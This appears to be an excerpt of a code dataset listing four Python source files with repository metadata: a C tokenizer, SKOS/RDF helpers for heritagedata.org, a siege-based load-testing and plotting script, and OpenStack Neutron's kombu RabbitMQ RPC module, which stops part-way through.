repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dawsonjon/Chips-2.0
|
chips/compiler/tokens.py
|
1
|
9314
|
__author__ = "Jon Dawson"
__copyright__ = "Copyright (C) 2012, Jonathan P Dawson"
__version__ = "0.1"
import os.path
import subprocess
from chips.compiler.exceptions import C2CHIPError
operators = [
"!", "~", "+", "-", "*", "/", "//", "%", "=", "==", "<", ">", "<=", ">=",
"!=", "|", "&", "^", "||", "&&", "(", ")", "{", "}", "[", "]", ";", "<<",
">>", ",", "+=", "-=", "*=", "/=", "%=", "&=", "|=", "<<=", ">>=", "^=",
"++", "--", "?", ":", ".", "->",
]
class Tokens:
"""Break the input file into a stream of tokens,
provide functions to traverse the stream."""
def __init__(self, filename, parameters={}):
self.tokens = []
self.definitions = []
self.filename = None
self.lineno = None
self.scan(
os.path.join(os.path.dirname(__file__), "builtins.h"),
external_preprocessor=False)
self.scan(os.path.abspath(filename))
tokens = []
for token in self.tokens:
f, l, t = token
if t in parameters:
tokens.append((f, l, str(parameters[t])))
else:
tokens.append(token)
self.tokens = tokens
def scan(self,
filename,
input_file=None,
parameters={},
external_preprocessor=True):
"""Convert the test file into tokens"""
self.filename = filename
if external_preprocessor:
directory = os.path.abspath(__file__)
directory = os.path.dirname(directory)
directory = os.path.join(directory, "include")
cpp_commands = [
"cpp",
"-nostdinc",
"-isystem",
directory,
filename]
pipe = subprocess.Popen(cpp_commands, stdout=subprocess.PIPE)
input_file = pipe.stdout
else:
if input_file is None:
try:
input_file = open(self.filename)
except IOError:
raise C2CHIPError("Cannot open file: " + self.filename)
token = []
tokens = []
self.lineno = 1
jump = False
for line in input_file:
# include files
line = line + " "
if jump:
if line.strip().startswith("#endif"):
jump = False
if line.strip().startswith("#else"):
jump = False
self.lineno += 1
continue
elif external_preprocessor and line.strip().startswith("#"):
l = line.strip()
l = l.lstrip("#")
l = l.split('"')
lineno = int(l[0].strip())
self.lineno = lineno
filename = l[1].strip().strip('"')
self.filename = filename
continue
elif line.strip().startswith("#include"):
filename = self.filename
lineno = self.lineno
self.tokens.extend(tokens)
if line.strip().endswith(">"):
directory = os.path.abspath(__file__)
directory = os.path.dirname(directory)
directory = os.path.join(directory, "include")
else:
directory = os.path.abspath(self.filename)
directory = os.path.dirname(directory)
self.filename = line.strip().replace(
"#include", "").strip(' ><"')
self.filename = os.path.join(directory, self.filename)
self.scan(self.filename)
self.lineno = lineno
self.filename = filename
tokens = []
self.lineno += 1
continue
elif line.strip().startswith("#define"):
definition = line.strip().split(" ")[1]
self.definitions.append(definition)
self.lineno += 1
continue
elif line.strip().startswith("#undef"):
definition = line.strip().split(" ")[1]
self.definitions.remove(definition)
self.lineno += 1
continue
elif line.strip().startswith("#ifdef"):
definition = line.strip().split(" ")[1]
if definition not in self.definitions:
jump = True
self.lineno += 1
continue
elif line.strip().startswith("#ifndef"):
definition = line.strip().split(" ")[1]
if definition in self.definitions:
jump = True
self.lineno += 1
continue
elif line.strip().startswith("#else"):
jump = True
self.lineno += 1
continue
elif line.strip().startswith("#endif"):
self.lineno += 1
continue
newline = True
for char in line:
if not token:
token = char
# c style comment
elif (token + char).startswith("/*"):
if (token + char).endswith("*/"):
token = ""
else:
token += char
# c++ style comment
elif token.startswith("//"):
if newline:
token = char
else:
token += char
# identifier
elif token[0].isalpha():
if char.isalnum() or char == "_":
token += char
else:
tokens.append((self.filename, self.lineno, token))
token = char
# number
elif token[0].isdigit():
if char.upper() in "0123456789ABCDEFXUL.":
token += char
elif token.upper().endswith("E") and char in ["+", "-"]:
token += char
else:
tokens.append((self.filename, self.lineno, token))
token = char
# string literal
elif token.startswith('"'):
if char == '"' and previous_char != "\\":
token += char
tokens.append((self.filename, self.lineno, token))
token = ""
else:
# remove dummy space from the end of a line
if newline:
token = token[:-1]
previous_char = char
token += char
# character literal
elif token.startswith("'"):
if char == "'":
token += char
tokens.append((self.filename, self.lineno, token))
token = ""
else:
token += char
# operator
elif token in operators:
if token + char in operators:
token += char
else:
tokens.append((self.filename, self.lineno, token))
token = char
else:
token = char
newline = False
self.lineno += 1
self.tokens.extend(tokens)
def error(self, string):
"""
Generate an error message (including the filename and line number)
"""
raise C2CHIPError(string + "\n", self.filename, self.lineno)
def peek(self):
"""
Return the next token in the stream, but don't consume it.
"""
if self.tokens:
return self.tokens[0][2]
else:
return ""
def peek_next(self):
"""
Return the next next token in the stream, but don't consume it.
"""
if len(self.tokens) > 1:
return self.tokens[1][2]
else:
return ""
def get(self):
"""Return the next token in the stream, and consume it."""
if self.tokens:
self.lineno = self.tokens[0][1]
self.filename = self.tokens[0][0]
try:
filename, lineno, token = self.tokens.pop(0)
except IndexError:
self.error("Unexpected end of file")
return token
def end(self):
"""Return True if all the tokens have been consumed."""
return not self.tokens
def expect(self, expected):
"""Consume the next token in the stream,
generate an error if it is not as expected."""
try:
filename, lineno, actual = self.tokens.pop(0)
except IndexError:
self.error("Unexpected end of file")
if self.tokens:
self.lineno = self.tokens[0][1]
self.filename = self.tokens[0][0]
if actual == expected:
return
else:
self.error("Expected: %s, got: %s" % (expected, actual))
|
mit
| 3,926,535,980,926,046,000
| 31.340278
| 77
| 0.432467
| false
| 5.045504
| false
| false
| false
|
OnroerendErfgoed/skosprovider_heritagedata
|
skosprovider_heritagedata/utils.py
|
1
|
5488
|
# -*- coding: utf-8 -*-
'''
Utility functions for :mod:`skosprovider_heritagedata`.
'''
import requests
from skosprovider.skos import (
Concept,
Label,
Note,
ConceptScheme)
from skosprovider.exceptions import ProviderUnavailableException
import logging
import sys
import requests
log = logging.getLogger(__name__)
PY3 = sys.version_info[0] == 3
if PY3: # pragma: no cover
binary_type = bytes
else: # pragma: no cover
binary_type = str
import rdflib
from rdflib.term import URIRef
from rdflib.namespace import RDF, SKOS, DC, DCTERMS, RDFS
PROV = rdflib.Namespace('http://www.w3.org/ns/prov#')
def conceptscheme_from_uri(conceptscheme_uri, **kwargs):
'''
Read a SKOS Conceptscheme from a :term:`URI`
:param string conceptscheme_uri: URI of the conceptscheme.
:rtype: skosprovider.skos.ConceptScheme
'''
s = kwargs.get('session', requests.Session())
graph = uri_to_graph('%s.rdf' % (conceptscheme_uri), session=s)
notes = []
labels = []
if graph is not False:
for s, p, o in graph.triples((URIRef(conceptscheme_uri), RDFS.label, None)):
label = Label(o.toPython(), "prefLabel", 'en')
labels.append(label)
for s, p, o in graph.triples((URIRef(conceptscheme_uri), DCTERMS.description, None)):
note = Note(o.toPython(), "scopeNote", 'en')
notes.append(note)
# get the conceptscheme
conceptscheme = ConceptScheme(
conceptscheme_uri,
labels=labels,
notes=notes
)
return conceptscheme
def things_from_graph(graph, concept_scheme):
'''
Read concepts and collections from a graph.
:param rdflib.Graph graph: Graph to read from.
:param skosprovider.skos.ConceptScheme concept_scheme: Conceptscheme the
concepts and collections belong to.
:rtype: :class:`list`
'''
clist = []
for sub, pred, obj in graph.triples((None, RDF.type, SKOS.Concept)):
uri = str(sub)
con = Concept(
id=_split_uri(uri, 1),
uri=uri,
concept_scheme = concept_scheme,
labels = _create_from_subject_typelist(graph, sub, Label.valid_types),
notes = _create_from_subject_typelist(graph, sub, Note.valid_types),
broader = _create_from_subject_predicate(graph, sub, SKOS.broader),
narrower = _create_from_subject_predicate(graph, sub, SKOS.narrower),
related = _create_from_subject_predicate(graph, sub, SKOS.related),
subordinate_arrays = []
)
clist.append(con)
# at this moment, Heritagedata does not support SKOS.Collection
# for sub, pred, obj in graph.triples((None, RDF.type, SKOS.Collection)):
# uri = str(sub)
# col = Collection(_split_uri(uri, 1), uri=uri)
# col.members = _create_from_subject_predicate(sub, SKOS.member)
# col.labels = _create_from_subject_typelist(sub, Label.valid_types)
# col.notes = _create_from_subject_typelist(sub, Note.valid_types)
# clist.append(col)
return clist
def _create_from_subject_typelist(graph, subject, typelist):
list = []
for p in typelist:
term = SKOS.term(p)
list.extend(_create_from_subject_predicate(graph, subject, term))
return list
def _create_from_subject_predicate(graph, subject, predicate):
list = []
for s, p, o in graph.triples((subject, predicate, None)):
type = predicate.split('#')[-1]
if Label.is_valid_type(type):
o = _create_label(o, type)
elif Note.is_valid_type(type):
o = _create_note(o, type)
else:
o = _split_uri(o, 1)
if o:
list.append(o)
return list
def _create_label(literal, type):
language = literal.language
if language is None:
return 'und' # return undefined code when no language
return Label(literal.toPython(), type, language)
def _create_note(literal, type):
if not Note.is_valid_type(type):
raise ValueError('Type of Note is not valid.')
return Note(text_(literal.value, encoding="utf-8"), type, _get_language_from_literal(literal))
def _get_language_from_literal(data):
if data.language is None:
return 'und' # return undefined code when no language
return text_(data.language, encoding="utf-8")
def _split_uri(uri, index):
return uri.strip('/').rsplit('/', 1)[index]
def uri_to_graph(uri, **kwargs):
'''
:param string uri: :term:`URI` where the RDF data can be found.
:rtype: rdflib.Graph
:raises skosprovider.exceptions.ProviderUnavailableException: if the
heritagedata.org services are down
'''
s = kwargs.get('session', requests.Session())
graph = rdflib.Graph()
try:
res = s.get(uri)
except requests.ConnectionError as e:
raise ProviderUnavailableException("URI not available: %s" % uri)
if res.status_code == 404:
return False
graph.parse(data=res.content)
#heritagedata.org returns a empy page/graph when a resource does not exists (statsu_code 200). For this reason we return False if the graph is empty
if len(graph) == 0:
return False
return graph
def text_(s, encoding='latin-1', errors='strict'):
""" If ``s`` is an instance of ``binary_type``, return
``s.decode(encoding, errors)``, otherwise return ``s``"""
if isinstance(s, binary_type):
return s.decode(encoding, errors)
return s
|
mit
| 6,342,921,371,170,018,000
| 30.54023
| 152
| 0.636662
| false
| 3.538362
| false
| false
| false
|
mr-ping/WebTesting
|
main.py
|
1
|
5059
|
#!/usr/bin/python
import os
import sys
import argparse
from log import Log
from chat import Trend
from chat import plot_trend as pl
from settings import *
def parse_args():
"""
Parsing shell command arguments, and override appropriate params
from setting module
:return: None
"""
parser = argparse.ArgumentParser(version=VERSION)
parser.add_argument('-u', action='store', dest='url')
parser.add_argument('-f', action='store', dest='url_file')
parser.add_argument('-t', action='store', dest='target_log_file')
parser.add_argument('-l', action='store', dest='log_file')
parser.add_argument('-p', action='store_true', dest='plotting', default=True)
parser.add_argument('-m', action='store', dest='max_allowed_concurrent', type=int)
parser.add_argument('-b', action='store', dest='base_concurrent', type=int)
parser.add_argument('-s', action='store', dest='step_concurrent', type=int)
result = parser.parse_args()
if result.url:
global url
url = result.url
if result.url_file:
global url_file
url_file = result.url_file
if result.target_log_file:
global target_file
target_file = result.target_log_file
if result.log_file:
global log_file
log_file = result.log_file
if result.plotting:
global plotting
plotting = result.plotting
if result.max_allowed_concurrent:
global max_concurrent
max_concurrent = result.max_allowed_concurrent
if result.base_concurrent:
global base_concurrent
base_concurrent = result.base_concurrent
if result.step_concurrent:
global step_concurrent
step_concurrent = result.step_concurrent
def check_url_source():
"""
Check out Obtaining url from commend line or urls file.
:return: A flag that represent the source of urls. String'
"""
global plotting
if not url_file and not url:
plotting = False
sys.stderr.write('You should figure out the url source.')
elif url_file and url:
plotting = False
sys.stderr.write('Url source come from either url address or url file')
elif url_file:
exist = os.path.exists(url_file)
if exist:
return 'file'
else:
plotting = False
sys.stderr.write('No such urls file.')
elif url:
return 'address'
def test(base_concurrent):
"""
Main method to do the Testing.
Looping siege tool until some conditions satisfied,
and generate a new log file from siege log file.
:param base_concurrent: number concurrent
:return: None
"""
url_source = check_url_source()
while True:
for i in range(num_samples):
if url_source == 'address':
#os.system('siege -c {concurrent} -t {duration} -l {address}'\
os.system('siege -c {concurrent} -r {repeat} -l {address}'\
.format(address=url,
concurrent=base_concurrent,
#duration=duration))
repeat=repeat))
elif url_source == 'file':
#os.system('siege -c {concurrent} -t {duration} -f {url_file} -l'\
os.system('siege -c {concurrent} -r {repeat} -f {url_file} -l'\
.format(url_file=url_file,
concurrent=base_concurrent,
#duration=duration))
repeat=repeat))
last = Log.get_last_logs(log_file, siege_log_line_length, 1,\
base_concurrent)
Log.add_new_log(target_file, last)
base_concurrent += step_concurrent
log = Log(target_file)
if log.get_last_arrive_rate(num_samples) < (1-fails_allowed) \
or base_concurrent > max_concurrent:
break
def plot():
"""
Plotting chat using the data that analyzed from testing log.
:return: None
"""
log = Log(target_file)
trans_rate_dict = log.get_steps_trans_rate()
arrive_rate_dict = log.get_steps_arrive_rate()
resp_time_dict = log.get_steps_resp_time()
trans_trend = Trend('Transaction Rate',
'simulated users',
'trans rate (trans/sec)',
'g', 1, 'bar',
step_concurrent/2)
trans_trend.get_points(trans_rate_dict)
arrive_trend = Trend('Arrive Rate',
'simulated users',
'arrive rate',
'g', 2, 'line')
arrive_trend.get_points(arrive_rate_dict)
resp_trend = Trend('Resp Time',
'simulated users',
'time(sec)',
'r', 2, 'line')
resp_trend.get_points(resp_time_dict)
pl(trans_trend, resp_trend, arrive_trend)
if __name__ == '__main__':
parse_args()
test(base_concurrent)
if plotting:
plot()
|
mit
| 379,554,074,709,667,840
| 31.63871
| 86
| 0.567108
| false
| 3.999209
| false
| false
| false
|
rickerc/neutron_audit
|
neutron/openstack/common/rpc/impl_kombu.py
|
1
|
32063
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import itertools
import socket
import ssl
import sys
import time
import uuid
import eventlet
import greenlet
import kombu
import kombu.connection
import kombu.entity
import kombu.messaging
from oslo.config import cfg
from neutron.openstack.common import excutils
from neutron.openstack.common.gettextutils import _
from neutron.openstack.common import network_utils
from neutron.openstack.common.rpc import amqp as rpc_amqp
from neutron.openstack.common.rpc import common as rpc_common
kombu_opts = [
cfg.StrOpt('kombu_ssl_version',
default='',
help='SSL version to use (valid only if SSL enabled)'),
cfg.StrOpt('kombu_ssl_keyfile',
default='',
help='SSL key file (valid only if SSL enabled)'),
cfg.StrOpt('kombu_ssl_certfile',
default='',
help='SSL cert file (valid only if SSL enabled)'),
cfg.StrOpt('kombu_ssl_ca_certs',
default='',
help=('SSL certification authority file '
'(valid only if SSL enabled)')),
cfg.StrOpt('rabbit_host',
default='localhost',
help='The RabbitMQ broker address where a single node is used'),
cfg.IntOpt('rabbit_port',
default=5672,
help='The RabbitMQ broker port where a single node is used'),
cfg.ListOpt('rabbit_hosts',
default=['$rabbit_host:$rabbit_port'],
help='RabbitMQ HA cluster host:port pairs'),
cfg.BoolOpt('rabbit_use_ssl',
default=False,
help='connect over SSL for RabbitMQ'),
cfg.StrOpt('rabbit_userid',
default='guest',
help='the RabbitMQ userid'),
cfg.StrOpt('rabbit_password',
default='guest',
help='the RabbitMQ password',
secret=True),
cfg.StrOpt('rabbit_virtual_host',
default='/',
help='the RabbitMQ virtual host'),
cfg.IntOpt('rabbit_retry_interval',
default=1,
help='how frequently to retry connecting with RabbitMQ'),
cfg.IntOpt('rabbit_retry_backoff',
default=2,
help='how long to backoff for between retries when connecting '
'to RabbitMQ'),
cfg.IntOpt('rabbit_max_retries',
default=0,
help='maximum retries with trying to connect to RabbitMQ '
'(the default of 0 implies an infinite retry count)'),
cfg.BoolOpt('rabbit_ha_queues',
default=False,
help='use H/A queues in RabbitMQ (x-ha-policy: all).'
'You need to wipe RabbitMQ database when '
'changing this option.'),
]
cfg.CONF.register_opts(kombu_opts)
LOG = rpc_common.LOG
def _get_queue_arguments(conf):
"""Construct the arguments for declaring a queue.
If the rabbit_ha_queues option is set, we declare a mirrored queue
as described here:
http://www.rabbitmq.com/ha.html
Setting x-ha-policy to all means that the queue will be mirrored
to all nodes in the cluster.
"""
return {'x-ha-policy': 'all'} if conf.rabbit_ha_queues else {}
class ConsumerBase(object):
"""Consumer base class."""
def __init__(self, channel, callback, tag, **kwargs):
"""Declare a queue on an amqp channel.
'channel' is the amqp channel to use
'callback' is the callback to call when messages are received
'tag' is a unique ID for the consumer on the channel
queue name, exchange name, and other kombu options are
passed in here as a dictionary.
"""
self.callback = callback
self.tag = str(tag)
self.kwargs = kwargs
self.queue = None
self.reconnect(channel)
def reconnect(self, channel):
"""Re-declare the queue after a rabbit reconnect."""
self.channel = channel
self.kwargs['channel'] = channel
self.queue = kombu.entity.Queue(**self.kwargs)
self.queue.declare()
def consume(self, *args, **kwargs):
"""Actually declare the consumer on the amqp channel. This will
start the flow of messages from the queue. Using the
Connection.iterconsume() iterator will process the messages,
calling the appropriate callback.
If a callback is specified in kwargs, use that. Otherwise,
use the callback passed during __init__()
If kwargs['nowait'] is True, then this call will block until
a message is read.
Messages will automatically be acked if the callback doesn't
raise an exception
"""
options = {'consumer_tag': self.tag}
options['nowait'] = kwargs.get('nowait', False)
callback = kwargs.get('callback', self.callback)
if not callback:
raise ValueError("No callback defined")
def _callback(raw_message):
message = self.channel.message_to_python(raw_message)
try:
msg = rpc_common.deserialize_msg(message.payload)
callback(msg)
except Exception:
LOG.exception(_("Failed to process message... skipping it."))
finally:
message.ack()
self.queue.consume(*args, callback=_callback, **options)
def cancel(self):
"""Cancel the consuming from the queue, if it has started."""
try:
self.queue.cancel(self.tag)
except KeyError as e:
# NOTE(comstud): Kludge to get around a amqplib bug
if str(e) != "u'%s'" % self.tag:
raise
self.queue = None
class DirectConsumer(ConsumerBase):
"""Queue/consumer class for 'direct'."""
def __init__(self, conf, channel, msg_id, callback, tag, **kwargs):
"""Init a 'direct' queue.
'channel' is the amqp channel to use
'msg_id' is the msg_id to listen on
'callback' is the callback to call when messages are received
'tag' is a unique ID for the consumer on the channel
Other kombu options may be passed
"""
# Default options
options = {'durable': False,
'queue_arguments': _get_queue_arguments(conf),
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
exchange = kombu.entity.Exchange(name=msg_id,
type='direct',
durable=options['durable'],
auto_delete=options['auto_delete'])
super(DirectConsumer, self).__init__(channel,
callback,
tag,
name=msg_id,
exchange=exchange,
routing_key=msg_id,
**options)
class TopicConsumer(ConsumerBase):
"""Consumer class for 'topic'."""
def __init__(self, conf, channel, topic, callback, tag, name=None,
exchange_name=None, **kwargs):
"""Init a 'topic' queue.
:param channel: the amqp channel to use
:param topic: the topic to listen on
:paramtype topic: str
:param callback: the callback to call when messages are received
:param tag: a unique ID for the consumer on the channel
:param name: optional queue name, defaults to topic
:paramtype name: str
Other kombu options may be passed as keyword arguments
"""
# Default options
options = {'durable': conf.amqp_durable_queues,
'queue_arguments': _get_queue_arguments(conf),
'auto_delete': conf.amqp_auto_delete,
'exclusive': False}
options.update(kwargs)
exchange_name = exchange_name or rpc_amqp.get_control_exchange(conf)
exchange = kombu.entity.Exchange(name=exchange_name,
type='topic',
durable=options['durable'],
auto_delete=options['auto_delete'])
super(TopicConsumer, self).__init__(channel,
callback,
tag,
name=name or topic,
exchange=exchange,
routing_key=topic,
**options)
class FanoutConsumer(ConsumerBase):
"""Consumer class for 'fanout'."""
def __init__(self, conf, channel, topic, callback, tag, **kwargs):
"""Init a 'fanout' queue.
'channel' is the amqp channel to use
'topic' is the topic to listen on
'callback' is the callback to call when messages are received
'tag' is a unique ID for the consumer on the channel
Other kombu options may be passed
"""
unique = uuid.uuid4().hex
exchange_name = '%s_fanout' % topic
queue_name = '%s_fanout_%s' % (topic, unique)
# Default options
options = {'durable': False,
'queue_arguments': _get_queue_arguments(conf),
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
exchange = kombu.entity.Exchange(name=exchange_name, type='fanout',
durable=options['durable'],
auto_delete=options['auto_delete'])
super(FanoutConsumer, self).__init__(channel, callback, tag,
name=queue_name,
exchange=exchange,
routing_key=topic,
**options)
class Publisher(object):
"""Base Publisher class."""
def __init__(self, channel, exchange_name, routing_key, **kwargs):
"""Init the Publisher class with the exchange_name, routing_key,
and other options
"""
self.exchange_name = exchange_name
self.routing_key = routing_key
self.kwargs = kwargs
self.reconnect(channel)
def reconnect(self, channel):
"""Re-establish the Producer after a rabbit reconnection."""
self.exchange = kombu.entity.Exchange(name=self.exchange_name,
**self.kwargs)
self.producer = kombu.messaging.Producer(exchange=self.exchange,
channel=channel,
routing_key=self.routing_key)
def send(self, msg, timeout=None):
"""Send a message."""
if timeout:
#
# AMQP TTL is in milliseconds when set in the header.
#
self.producer.publish(msg, headers={'ttl': (timeout * 1000)})
else:
self.producer.publish(msg)
class DirectPublisher(Publisher):
"""Publisher class for 'direct'."""
def __init__(self, conf, channel, msg_id, **kwargs):
"""init a 'direct' publisher.
Kombu options may be passed as keyword args to override defaults
"""
options = {'durable': False,
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
super(DirectPublisher, self).__init__(channel, msg_id, msg_id,
type='direct', **options)
class TopicPublisher(Publisher):
"""Publisher class for 'topic'."""
def __init__(self, conf, channel, topic, **kwargs):
"""init a 'topic' publisher.
Kombu options may be passed as keyword args to override defaults
"""
options = {'durable': conf.amqp_durable_queues,
'auto_delete': conf.amqp_auto_delete,
'exclusive': False}
options.update(kwargs)
exchange_name = rpc_amqp.get_control_exchange(conf)
super(TopicPublisher, self).__init__(channel,
exchange_name,
topic,
type='topic',
**options)
class FanoutPublisher(Publisher):
"""Publisher class for 'fanout'."""
def __init__(self, conf, channel, topic, **kwargs):
"""init a 'fanout' publisher.
Kombu options may be passed as keyword args to override defaults
"""
options = {'durable': False,
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
super(FanoutPublisher, self).__init__(channel, '%s_fanout' % topic,
None, type='fanout', **options)
class NotifyPublisher(TopicPublisher):
"""Publisher class for 'notify'."""
def __init__(self, conf, channel, topic, **kwargs):
self.durable = kwargs.pop('durable', conf.amqp_durable_queues)
self.queue_arguments = _get_queue_arguments(conf)
super(NotifyPublisher, self).__init__(conf, channel, topic, **kwargs)
def reconnect(self, channel):
super(NotifyPublisher, self).reconnect(channel)
# NOTE(jerdfelt): Normally the consumer would create the queue, but
# we do this to ensure that messages don't get dropped if the
# consumer is started after we do
queue = kombu.entity.Queue(channel=channel,
exchange=self.exchange,
durable=self.durable,
name=self.routing_key,
routing_key=self.routing_key,
queue_arguments=self.queue_arguments)
queue.declare()
class Connection(object):
"""Connection object."""
pool = None
def __init__(self, conf, server_params=None):
self.consumers = []
self.consumer_thread = None
self.proxy_callbacks = []
self.conf = conf
self.max_retries = self.conf.rabbit_max_retries
# Try forever?
if self.max_retries <= 0:
self.max_retries = None
self.interval_start = self.conf.rabbit_retry_interval
self.interval_stepping = self.conf.rabbit_retry_backoff
# max retry-interval = 30 seconds
self.interval_max = 30
self.memory_transport = False
if server_params is None:
server_params = {}
# Keys to translate from server_params to kombu params
server_params_to_kombu_params = {'username': 'userid'}
ssl_params = self._fetch_ssl_params()
params_list = []
for adr in self.conf.rabbit_hosts:
hostname, port = network_utils.parse_host_port(
adr, default_port=self.conf.rabbit_port)
params = {
'hostname': hostname,
'port': port,
'userid': self.conf.rabbit_userid,
'password': self.conf.rabbit_password,
'virtual_host': self.conf.rabbit_virtual_host,
}
for sp_key, value in server_params.iteritems():
p_key = server_params_to_kombu_params.get(sp_key, sp_key)
params[p_key] = value
if self.conf.fake_rabbit:
params['transport'] = 'memory'
if self.conf.rabbit_use_ssl:
params['ssl'] = ssl_params
params_list.append(params)
self.params_list = params_list
brokers_count = len(self.params_list)
self.next_broker_indices = itertools.cycle(range(brokers_count))
self.memory_transport = self.conf.fake_rabbit
self.connection = None
self.reconnect()
def _fetch_ssl_params(self):
"""Handles fetching what ssl params should be used for the connection
(if any).
"""
ssl_params = dict()
# http://docs.python.org/library/ssl.html - ssl.wrap_socket
if self.conf.kombu_ssl_version:
ssl_params['ssl_version'] = self.conf.kombu_ssl_version
if self.conf.kombu_ssl_keyfile:
ssl_params['keyfile'] = self.conf.kombu_ssl_keyfile
if self.conf.kombu_ssl_certfile:
ssl_params['certfile'] = self.conf.kombu_ssl_certfile
if self.conf.kombu_ssl_ca_certs:
ssl_params['ca_certs'] = self.conf.kombu_ssl_ca_certs
# We might want to allow variations in the
# future with this?
ssl_params['cert_reqs'] = ssl.CERT_REQUIRED
if not ssl_params:
# Just have the default behavior
return True
else:
# Return the extended behavior
return ssl_params
def _connect(self, params):
"""Connect to rabbit. Re-establish any queues that may have
been declared before if we are reconnecting. Exceptions should
be handled by the caller.
"""
if self.connection:
LOG.info(_("Reconnecting to AMQP server on "
"%(hostname)s:%(port)d") % params)
try:
self.connection.release()
except self.connection_errors:
pass
# Setting this in case the next statement fails, though
# it shouldn't be doing any network operations, yet.
self.connection = None
self.connection = kombu.connection.BrokerConnection(**params)
self.connection_errors = self.connection.connection_errors
if self.memory_transport:
# Kludge to speed up tests.
self.connection.transport.polling_interval = 0.0
self.consumer_num = itertools.count(1)
self.connection.connect()
self.channel = self.connection.channel()
# work around 'memory' transport bug in 1.1.3
if self.memory_transport:
self.channel._new_queue('ae.undeliver')
for consumer in self.consumers:
consumer.reconnect(self.channel)
LOG.info(_('Connected to AMQP server on %(hostname)s:%(port)d') %
params)
def reconnect(self):
"""Handles reconnecting and re-establishing queues.
Will retry up to self.max_retries number of times.
self.max_retries = 0 means to retry forever.
Sleep between tries, starting at self.interval_start
seconds, backing off self.interval_stepping number of seconds
each attempt.
"""
attempt = 0
while True:
params = self.params_list[next(self.next_broker_indices)]
attempt += 1
try:
self._connect(params)
return
except (IOError, self.connection_errors) as e:
pass
except Exception as e:
# NOTE(comstud): Unfortunately it's possible for amqplib
# to return an error not covered by its transport
# connection_errors in the case of a timeout waiting for
# a protocol response. (See paste link in LP888621)
# So, we check all exceptions for 'timeout' in them
# and try to reconnect in this case.
if 'timeout' not in str(e):
raise
log_info = {}
log_info['err_str'] = str(e)
log_info['max_retries'] = self.max_retries
log_info.update(params)
if self.max_retries and attempt == self.max_retries:
LOG.error(_('Unable to connect to AMQP server on '
'%(hostname)s:%(port)d after %(max_retries)d '
'tries: %(err_str)s') % log_info)
# NOTE(comstud): Copied from original code. There's
# really no better recourse because if this was a queue we
# need to consume on, we have no way to consume anymore.
sys.exit(1)
if attempt == 1:
sleep_time = self.interval_start or 1
elif attempt > 1:
sleep_time += self.interval_stepping
if self.interval_max:
sleep_time = min(sleep_time, self.interval_max)
log_info['sleep_time'] = sleep_time
LOG.error(_('AMQP server on %(hostname)s:%(port)d is '
'unreachable: %(err_str)s. Trying again in '
'%(sleep_time)d seconds.') % log_info)
time.sleep(sleep_time)
def ensure(self, error_callback, method, *args, **kwargs):
while True:
try:
return method(*args, **kwargs)
except (self.connection_errors, socket.timeout, IOError) as e:
if error_callback:
error_callback(e)
except Exception as e:
# NOTE(comstud): Unfortunately it's possible for amqplib
# to return an error not covered by its transport
# connection_errors in the case of a timeout waiting for
# a protocol response. (See paste link in LP888621)
# So, we check all exceptions for 'timeout' in them
# and try to reconnect in this case.
if 'timeout' not in str(e):
raise
if error_callback:
error_callback(e)
self.reconnect()
def get_channel(self):
"""Convenience call for bin/clear_rabbit_queues."""
return self.channel
def close(self):
"""Close/release this connection."""
self.cancel_consumer_thread()
self.wait_on_proxy_callbacks()
self.connection.release()
self.connection = None
def reset(self):
"""Reset a connection so it can be used again."""
self.cancel_consumer_thread()
self.wait_on_proxy_callbacks()
self.channel.close()
self.channel = self.connection.channel()
# work around 'memory' transport bug in 1.1.3
if self.memory_transport:
self.channel._new_queue('ae.undeliver')
self.consumers = []
def declare_consumer(self, consumer_cls, topic, callback):
"""Create a Consumer using the class that was passed in and
add it to our list of consumers
"""
def _connect_error(exc):
log_info = {'topic': topic, 'err_str': str(exc)}
LOG.error(_("Failed to declare consumer for topic '%(topic)s': "
"%(err_str)s") % log_info)
def _declare_consumer():
consumer = consumer_cls(self.conf, self.channel, topic, callback,
self.consumer_num.next())
self.consumers.append(consumer)
return consumer
return self.ensure(_connect_error, _declare_consumer)
def iterconsume(self, limit=None, timeout=None):
"""Return an iterator that will consume from all queues/consumers."""
info = {'do_consume': True}
def _error_callback(exc):
if isinstance(exc, socket.timeout):
LOG.debug(_('Timed out waiting for RPC response: %s') %
str(exc))
raise rpc_common.Timeout()
else:
LOG.exception(_('Failed to consume message from queue: %s') %
str(exc))
info['do_consume'] = True
def _consume():
if info['do_consume']:
queues_head = self.consumers[:-1]
queues_tail = self.consumers[-1]
for queue in queues_head:
queue.consume(nowait=True)
queues_tail.consume(nowait=False)
info['do_consume'] = False
return self.connection.drain_events(timeout=timeout)
for iteration in itertools.count(0):
if limit and iteration >= limit:
raise StopIteration
yield self.ensure(_error_callback, _consume)
def cancel_consumer_thread(self):
"""Cancel a consumer thread."""
if self.consumer_thread is not None:
self.consumer_thread.kill()
try:
self.consumer_thread.wait()
except greenlet.GreenletExit:
pass
self.consumer_thread = None
def wait_on_proxy_callbacks(self):
"""Wait for all proxy callback threads to exit."""
for proxy_cb in self.proxy_callbacks:
proxy_cb.wait()
def publisher_send(self, cls, topic, msg, timeout=None, **kwargs):
"""Send to a publisher based on the publisher class."""
def _error_callback(exc):
log_info = {'topic': topic, 'err_str': str(exc)}
LOG.exception(_("Failed to publish message to topic "
"'%(topic)s': %(err_str)s") % log_info)
def _publish():
publisher = cls(self.conf, self.channel, topic, **kwargs)
publisher.send(msg, timeout)
self.ensure(_error_callback, _publish)
